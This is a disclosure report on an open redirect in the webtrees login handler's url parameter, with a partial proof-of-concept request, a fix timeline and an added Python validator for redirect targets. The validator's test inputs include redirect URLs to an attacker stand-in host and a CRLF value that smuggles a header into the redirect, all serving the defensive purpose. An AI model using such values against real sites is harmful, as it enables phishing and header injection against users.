Open Redirect in fisharebest/webtrees

Reported on Sep 28th 2021

Open redirect at login via the url= parameter

Proof of Concept

// PoC.request
POST /demo-stable/index.php?route=%2Fdemo-stable%2Flogin%2Fdemo HTTP/2
Cookie: __Secure-WT-ID=ekks8678620p55do7do21jd4p1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers


Steps to Reproduce

Access the login page with the URL:

After a successful login, the application redirects to


The url parameter accepted by the login handler is not restricted to relative URLs within the application. An attacker can therefore hand a victim a login link to the legitimate webtrees site that, once the victim has authenticated, sends the browser to an attacker-controlled URL, making the malicious destination appear to be a valid page reached from the trusted site.
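As an added illustration of the check the report calls for (this is not webtrees code and is not part of the original report; it is written in Python rather than the project's PHP, and the function name, the base path and the sample inputs are assumptions), a redirect-target validator that accepts only path-relative URLs inside the application and rejects absolute URLs, protocol-relative "//host" forms, backslash variants that browsers normalise to "//", and control characters:

```python
"""Redirect-target validation for a post-login ``url`` parameter.

Added example, not code from the webtrees project. The function name,
the base path "/demo-stable/" and the sample inputs are assumptions.
"""
from urllib.parse import urlsplit


def safe_redirect_target(candidate, base_path):
    """Return ``candidate`` if it is a relative URL inside the application,
    otherwise fall back to ``base_path``.

    ``base_path`` is the application's own path prefix (e.g. "/demo-stable/").
    Anything that could make a browser leave the current origin is rejected:
    absolute URLs, protocol-relative "//host" references, backslash variants
    that browsers turn into "//", and control characters that could be abused
    to inject into the Location header.
    """
    if not isinstance(candidate, str) or not candidate:
        return base_path

    # Reject whitespace and control characters anywhere in the value.
    if any(ord(ch) <= 0x20 or ord(ch) == 0x7F for ch in candidate):
        return base_path

    # Browsers treat "\" like "/" in the scheme/authority part, so "/\evil"
    # is parsed as "//evil". Refuse backslashes outright.
    if "\\" in candidate:
        return base_path

    # Must be a path-absolute reference: exactly one leading slash.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return base_path

    # Defence in depth: the URL parser must agree there is no scheme or host.
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return base_path
    if parts.scheme or parts.netloc:
        return base_path

    # Finally confine the redirect to the application's own path prefix.
    if not candidate.startswith(base_path):
        return base_path

    return candidate


if __name__ == "__main__":
    BASE = "/demo-stable/"  # assumed application base path
    # Constructed sample inputs: one legitimate target, then attack variants.
    samples = [
        "/demo-stable/index.php?route=%2Fdemo-stable%2Ftree%2Fdemo",
        "https://attacker.example/login",
        "//attacker.example/",
        "/\\attacker.example/",
        "/demo-stable/\r\nSet-Cookie: a=b",
        "/other-app/",
    ]
    for sample in samples:
        print(repr(sample), "->", safe_redirect_target(sample, BASE))
```

The prefix check is deliberately strict: a value of "/demo-stable" without the trailing slash falls back to the base path rather than being special-cased, because a fallback to the application's own landing page is always safe while a permissive match is the kind of shortcut that reintroduces the bug.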

We have contacted a member of the fisharebest/webtrees team and are waiting to hear back (a month ago)
Greg Roach validated this vulnerability a month ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Greg Roach confirmed that a fix has been merged on 551ad4 a month ago
Greg Roach has been awarded the fix bounty